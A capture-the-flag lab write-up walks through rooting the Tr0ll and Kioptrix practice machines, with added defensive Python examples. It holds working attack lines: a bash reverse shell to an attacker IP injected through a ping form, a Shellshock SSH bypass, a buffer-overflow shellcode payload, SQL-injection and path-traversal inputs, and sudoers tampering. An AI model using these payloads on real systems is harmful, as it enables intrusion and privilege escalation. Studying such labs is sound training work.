Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple: gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

'''

2) nikto -h 192.168.189.197
# It found a '/secret/' directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let's try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We're in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on 'good_luck' -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
13) Click on 'this_folder_contains_the_password/' -> Pass.txt
# Note: Either 'Pass.txt' or its contents 'Good_job_:)' could be the password
14) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
15) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We're in
16) cat root/Proof.txt
# Permission denied, we're going to have to do privilege escalation
17) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
18) vi /lib/log/cleaner.py
Modify the try:
os.system('usermod -aG sudo overflow')

# Initially the modification didn't seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
19) id
# Became a sudoer
20) sudo ls /root
21) sudo cat /root/proof.txt
# Got the flag
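The `find / -perm -o+w` step is the whole privilege escalation: a script that root runs on a schedule (cleaner.py) lives in a file anyone can write to. The audit below is an added example, not code from the box or from this write-up. It walks a directory tree the way that `find` does, lists every world-writable regular file, and flags the ones root owns and is likely to execute (executable bit set, or a script extension). `make_demo_tree()` builds a constructed temp directory with one world-writable `cleaner.py` and one normally permissioned file so the script can be run offline; point it at `/` on a real host to reproduce the check the write-up relies on.

```python
import os
import stat

# Script extensions worth flagging when root owns a world-writable copy.
SCRIPT_EXTENSIONS = (".py", ".sh", ".pl")


def find_world_writable(root):
    """Walk `root` and return (path, uid, mode) for every regular file whose
    other-write bit is set.  Symlinks are skipped: their own mode bits are
    meaningless, and the target is reported when the walk reaches it."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable, or removed between listdir and stat
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                hits.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return hits


def is_high_risk(path, uid, mode):
    """A world-writable file is high risk when root owns it and is likely to
    run it: executable by anyone, or a script judged by its extension."""
    executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    scripty = path.endswith(SCRIPT_EXTENSIONS)
    return uid == 0 and (executable or scripty)


def audit(root):
    """World-writable files under `root`, high-risk entries first."""
    hits = find_world_writable(root)
    return sorted(hits, key=lambda h: (not is_high_risk(*h), h[0]))


def make_demo_tree():
    """Constructed fixture: a temp dir with one world-writable script and one
    normally permissioned file, so the audit can be exercised offline."""
    import tempfile
    root = tempfile.mkdtemp(prefix="ww-demo-")
    script = os.path.join(root, "cleaner.py")
    notes = os.path.join(root, "notes.txt")
    for path in (script, notes):
        with open(path, "w") as fh:
            fh.write("# demo\n")
    os.chmod(script, 0o666)
    os.chmod(notes, 0o644)
    return root, script, notes


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_demo_tree()[0]
    for path, uid, mode in audit(target):
        flag = "HIGH" if is_high_risk(path, uid, mode) else "    "
        print(f"{flag} {oct(mode)} uid={uid} {path}")
```

The fix on a real system is the mirror image of the check: root-run scripts belong in root-owned directories with mode 0755 or tighter, and the cron job that runs them should be reviewed for anything else it sources.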

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

 

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
'''
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

'''

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
'''
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

'''

4) wfuzz --hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories - only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz --hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

'''
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
'''

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It's a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It's password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out "TRY HARDER LOL!" and closes the connection
# Looks like it's forcing this command (echo) to be run once we log in

20) Search for 'ssh exploit'
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands
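The reason the trick in the next step works is worth spelling out from the defender's side: sshd runs the key's forced command through the login shell and hands the client's requested command over in the `SSH_ORIGINAL_COMMAND` environment variable. A bash that imports function definitions from the environment without checking for trailing text will execute whatever follows the `() { :;};` prefix. The code below is an added example, not part of the write-up: a detector for that prefix over log lines, and the standard local self-test that tells you whether the bash on a host still has the bug. The log lines are constructed (the third mimics an application that logs the forced command's environment; it is not real sshd output).

```python
import re
import subprocess

# The shape of the attack: a value that begins with an empty bash function
# definition "() {" and carries commands after it.  This is the same pattern
# IDS signatures matched on, and it matches '() { :;}; /bin/bash' from the
# next step.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Constructed sample log lines (not from the box): a benign web request, a web
# request carrying the pattern in its User-Agent, and a hypothetical line from
# an application that logs the SSH_ORIGINAL_COMMAND it was handed.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2015:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2015:10:00:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash"',
    'forced-command: SSH_ORIGINAL_COMMAND="() { :;}; /bin/bash" user=noob',
]


def find_shellshock_patterns(lines):
    """Return the indices of lines carrying an environment function definition."""
    return [i for i, line in enumerate(lines) if SHELLSHOCK_RE.search(line)]


def bash_is_vulnerable(bash="bash"):
    """Standard self-test: export a variable whose value is a function definition
    with trailing commands, then run an unrelated command.  A patched bash only
    prints "test"; a vulnerable one also prints "vulnerable" while importing the
    environment.  Returns True/False, or None when bash cannot be run."""
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        result = subprocess.run([bash, "-c", "echo test"], env=env,
                                capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in result.stdout


if __name__ == "__main__":
    for i in find_shellshock_patterns(SAMPLE_LOG):
        print("suspicious:", SAMPLE_LOG[i])
    print("local bash vulnerable:", bash_is_vulnerable())
```

Patching bash is the fix; the forced command on the key is not a security boundary on its own, because the shell that runs it sees the client-controlled environment before the command ever executes.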

22) ssh noob@192.168.189.204 -i noob '() { :;}; /bin/bash'
23) id
# We're in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There's a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
'''
After running all three files, we get the following:
- door1 r00t lets us input data
- door2 prints:
Good job, stand by, executing root shell...
BUHAHAHA NOOB!

- door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let's go with door1. Binary exploitation?
'''

29) cd door1
30) gdb -q ./r00t
31) run $(python -c 'print "A" * 500')
# We get a segmentation fault
32) run $(python -c 'print "A" * 300')
33) run $(python -c 'print "A" * 200')
34) run $(python -c 'print "A" * 250')
35) run $(python -c 'print "A" * 270')
36) run $(python -c 'print "A" * 268 + "B" * 4')
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c 'print "A" * 268 + "B" * 4')
40) x/100x $esp
'''
Notice where our A's start
We can now load and run our shellcode

Let's use the execve /bin/sh shellcode I wrote, which is 25 bytes in size
'''

41) run $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')
# Confirming it works

42) ./r00t $(python -c 'print "A" * 268 + "\x80\xfb\xff\xbf" + "\x90" * 20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!

Kioptrix Write-Up

What follows is a write-up of several vulnerable machines, Kioptrix #1 through #5.

The object of the game is to acquire root access via any means possible.
The purpose of the games is to practice techniques in vulnerability assessment and exploitation. There are multiple ways to get root access and compromise the system.

These machines are run in a host-only setup, as they are full of vulnerabilities and internet access would be dangerous.

[*] STATUS: COMPLETED

Kioptrix 1 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
'''
Scan for address and open ports

Note the following two services:
Samba smbd
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

These two could be our way in
'''

2) enum4linux 192.168.189.185
# Note: Server=[Samba 2.2.1a]
3) nikto -h 192.168.189.185
# We find a lot of vulnerabilities

4) Search Google for: Samba 2.2.1 exploit
# The first result is a verified remote execution exploit
5) wget https://www.exploit-db.com/download/10
6) mv 10 samba_228_remote.c
7) gcc -o samba_228_remote samba_228_remote.c
8) ./samba_228_remote
9) ./samba_228_remote -b 0 -c 192.168.189.130 192.168.189.185
10) whoami
# We got root
11) cat /var/mail/root
# We own this machine

 

Kioptrix 2 Write-Up

1) nmap -sS -sV -Pn 192.168.0.0/24
'''
Scan for address and open ports

Note the following three services:
Apache httpd 2.0.52 ((CentOS))
CUPS 1.1
MySQL (unauthorized)

These three could be our way in
'''

2) Browse to: 192.168.0.20
username: admin
password: ' or '1'='1
# We're in

3) ping localhost; ls
# The application is vulnerable to command injection
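`ping localhost; ls` works because the page builds a shell command line out of the form field, so the `;` ends the intended command and starts a new one. Below, as an added example that is not from the Kioptrix code or this write-up, is the vulnerable pattern next to the hardened one in Python. `echo` stands in for `ping` so the example runs anywhere without network access; the injection mechanics are identical. `validate_host()` accepts only an IP address or a plain hostname, and `safe_ping()` passes the host as one argv element so no shell ever parses it.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(host):
    """Accept an IP address or a plain hostname; reject everything else,
    including anything containing shell metacharacters or whitespace."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"not a hostname or IP address: {host!r}")


def unsafe_ping(host):
    """The vulnerable pattern: user input spliced into a command string that a
    shell interprets.  A ';' in `host` terminates the echo and runs a second
    command, exactly as 'ping localhost; ls' did on the box."""
    completed = subprocess.run(f"echo pinging {host}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def safe_ping(host):
    """Hardened: validate first, then pass an argument vector.  Without
    shell=True the host is a single argv element and never parsed as syntax."""
    host = validate_host(host)
    completed = subprocess.run(["echo", "pinging", host],
                               capture_output=True, text=True)
    return completed.stdout


def is_accepted(host):
    """True when the hardened path would run a command for this input."""
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "localhost; echo INJECTED"
    print(unsafe_ping(payload), end="")   # the second command runs
    print("hardened accepts payload:", is_accepted(payload))
    print(safe_ping("localhost"), end="")
```

The allow-list is the important half: quoting the value for the shell also works in principle, but an argv list plus a strict validator removes the shell from the picture entirely and is much harder to get subtly wrong.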

4) nc -n -v -l -p 443
5) In the browser: ping localhost; bash -i >& /dev/tcp/192.168.0.19/443 0>&1
6) id
# We got a shell, but not as a privileged user
7) Search: linux centos exploit
# The second result is for privilege escalation – just what we need

8) cd /tmp
9) wget https://www.exploit-db.com/download/9545 --no-check-certificate
10) mv 9545 centos_escalate.c
11) gcc -o centos_escalate centos_escalate.c
12) ./centos_escalate
13) whoami
# We got root

 

Kioptrix 3 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
2) gedit /etc/hosts
Add:
<ip> kioptrix3.com
192.168.189.195 kioptrix3.com

3) Browse to kioptrix3.com
4) Right-click -> View Page Source Code
# Notice the use of LotusCMS
5) Search: lotuscms exploit
# The third result is for eval() remote command execution
# Exploit: https://www.exploit-db.com/exploits/18565/
6) Start Metasploit
7) search LotusCMS
8) use exploit/multi/http/lcms_php_exec
9) options
10) set RHOST 192.168.189.195
11) set URI /
12) exploit
13) ls
# Remember they were talking about the gallery
# Let's check it out
14) ls gallery
15) cat gallery/gconfig.php
# Notice the credentials: root:fuckeyou
16) Browse to: http://kioptrix3.com/phpmyadmin/index.php -> Enter the above credentials
17) Gallery -> dev_accounts
# Note the hashes
18) Browse to: https://hashkiller.co.uk/md5-decrypter.aspx
Enter the hash: 5badcaf789d3d1d09794d8f021f40f0e
Result: starwars

19) ssh loneferret@192.168.189.195 -> Enter the password: starwars
20) cat CompanyPolicy.README
21) /usr/local/bin/ht
# I got an error: Error opening terminal: xterm-256color
# I solved it by entering: export TERM=xterm
22) /usr/local/bin/ht
23) Fn+F3 -> /etc/sudoers -> Enter
24) Under 'User privilege specification' add to loneferret: /bin/bash
25) sudo /bin/bash
26) whoami
# We got root
27) cd /root
28) cat Congrats.txt

 

Kioptrix 4 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
'''
Note the following services:
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

They could be our way in.

'''

2) enum4linux -a 192.168.189.196
'''
Note the users:
Account: nobody Name: nobody
Account: robert Name: ,,,
Account: root Name: root
Account: john Name: ,,,
loneferret Name: loneferret,,,

We can try using one of these accounts

'''

3) Browse to: 192.168.189.196
user: robert
pass: ' or '1'='1

# Note the password: ADGAdsafdfwt4gadfga==
# Since ssh is also on and the web page isn't showing much else, we can try that

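The `' or '1'='1` login worked on Kioptrix 2 and again here on Kioptrix 4 for the same reason: the password is pasted straight into the SQL text, so the quote closes the string and the `or '1'='1` makes the WHERE clause true for every row. The snippet below is an added example, not the Kioptrix PHP or anything from this write-up. It uses an in-memory SQLite table with a constructed user and password, and shows the concatenated query accepting the payload for any username while the parameterised version rejects it.

```python
import sqlite3

# Constructed demo data, not the Kioptrix accounts.
DEMO_PASSWORD = "constructed-demo-password"


def make_db():
    """In-memory users table with a single known account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", DEMO_PASSWORD))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String concatenation: user text becomes SQL grammar.  With the payload
    ' or '1'='1 the statement reads
        ... WHERE username='x' AND password='' or '1'='1'
    and the trailing OR is true for every row, whatever the username."""
    query = (f"SELECT username FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised query: values travel separately from the statement text,
    so quotes inside them are data and can never change the query's shape."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1'='1"
    print("vulnerable login with payload:", vulnerable_login(conn, "admin", payload))
    print("safe login with payload:      ", safe_login(conn, "admin", payload))
    print("safe login with real password:", safe_login(conn, "admin", DEMO_PASSWORD))
```

Two things the demo glosses over because they are not the point here: a real application compares a password hash rather than the password itself (the Kioptrix 3 step with the MD5 hash shows why the choice of hash matters), and the same parameterisation applies to every other field that reaches a query, not only the login form.
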
4) ssh robert@192.168.189.196
5) ?
# Checking out what we can use

6) echo os.system('/bin/bash')
7) ps aux | grep root
# Note that MySQL is running with root privileges
8) mysql
9) select sys_exec("echo 'robert ALL=(ALL) ALL' >> /etc/sudoers");
# Adding "our" account to sudoers
10) exit
11) sudo bash
12) id
# We got root
13) cat /root/congrats.txt
Side-note:
Initially I also searched for “ubuntu 5.6 exploit” and thought of using the following exploit: https://www.exploit-db.com/papers/15311/

That might also be another way in.

 

Kioptrix 5 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.0.0/24
'''
Note the following:
Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

It’s open in both port 80 and port 8080.

'''

2) Browse to: 192.168.0.85
3) Right-click -> View Page Source Code
# Notice: URL=pChart2.1.3/index.php"
4) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php
5) Search: pChart2.1.3
6) Read: https://www.exploit-db.com/exploits/31173/
# Let’s try directory traversal
7) Browse to: 192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# The web app is vulnerable to directory traversal
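The `Script=%2f..%2f..%2fetc/passwd` value exposes two bugs stacked on top of each other: the parameter is URL-decoded and joined onto the document root with no check for `..`, and because the decoded value starts with `/`, a naive path join throws the document root away altogether. The snippet below is an added example in Python, not pChart's code or anything from this write-up. `DOC_ROOT` is an assumed path. `vulnerable_resolve()` reproduces the lookup the way the traversal implies it works, and `safe_resolve()` shows the containment check that stops it.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/www/pChart2.1.3/examples"  # assumed document root for the demo


def vulnerable_resolve(base, script):
    """URL-decode and join, with nothing else: '..' is never examined, and a
    leading '/' in the decoded value makes posixpath.join discard `base`, so
    '/../../etc/passwd' normalises straight to '/etc/passwd'."""
    return posixpath.normpath(posixpath.join(base, unquote(script)))


def safe_resolve(base, script):
    """Decode once, strip any leading slash so the join stays relative,
    normalise, then refuse anything that does not sit beneath `base`."""
    base = posixpath.normpath(base)
    relative = unquote(script).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(base, relative))
    if candidate != base and not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes document root: {script!r}")
    return candidate


def is_contained(base, script):
    """True when the hardened resolver would serve this Script= value."""
    try:
        safe_resolve(base, script)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    payload = "%2f..%2f..%2fetc/passwd"  # the Script= value from the step above
    print("vulnerable:", vulnerable_resolve(DOC_ROOT, payload))
    print("contained: ", is_contained(DOC_ROOT, payload))
    print("safe:      ", safe_resolve(DOC_ROOT, "index.php"))
```

The check is purely lexical, which is why it is testable offline; in a real handler you would also resolve symlinks (`os.path.realpath`) after this check, since the quoted httpd.conf has `FollowSymLinks` on and a link inside the document root can point anywhere.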

8) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

'''
Notice at the end of the file:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Apparently we can get in if we set the User-Agent to Mozilla 4

'''

9) Search: mozilla firefox 4.0 user agent string
10) Browse to: http://www.useragentstring.com/pages/useragentstring.php?name=Firefox
11) Ctrl-F -> mozilla/4.0 -> http://www.useragentstring.com/index.php?id=19040
12) In User Agent Switcher:
Edit User Agents
New
Description: Mozilla FireFox 4.0
User Agent:
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)

13) Browse to: http://192.168.0.85:8080/
14) Click on 'phptax'
15) Open Metasploit -> search phptax -> use exploit/multi/http/phptax_exec
16) show options -> set RHOST 192.168.0.85 -> set RPORT 8080 -> exploit
17) id
18) uname -a
# Getting kernel details to figure out how to do privilege escalation

19) Search: FreeBSD 9.0 exploit
# The first result is what we're looking for
# https://www.exploit-db.com/exploits/28718/

20) wget https://www.exploit-db.com/download/28718
# Downloading it to our machine
21) mv 28718 freeBSD9_priv_esc.c
22) nc -lvp 8888 < freeBSD9_priv_esc.c
# Hosting the exploit on our machine
# We will download the file from the limited shell

23) nc -nv 192.168.0.87 8888 > die.c
24) Stop nc
25) gcc die.c -o die
26) ./die
27) id
# We got root
28) cat /root/congrats.txt
29) cat /root/ossec-alerts.log
'''
For fun, check out how noisy we were during our attack
As the congrats.txt explains, figuring out how to approach and attack the target before actually attacking is extremely important. Otherwise you will make a lot of noise and get caught early on as a result.
'''

 

End-Notes:

Very fun machines to exploit. As the Kioptrix website clearly states, they are intended for beginners, hence they are easy to exploit for the seasoned security tester. A big thanks to loneferret for such fun yet educational challenges!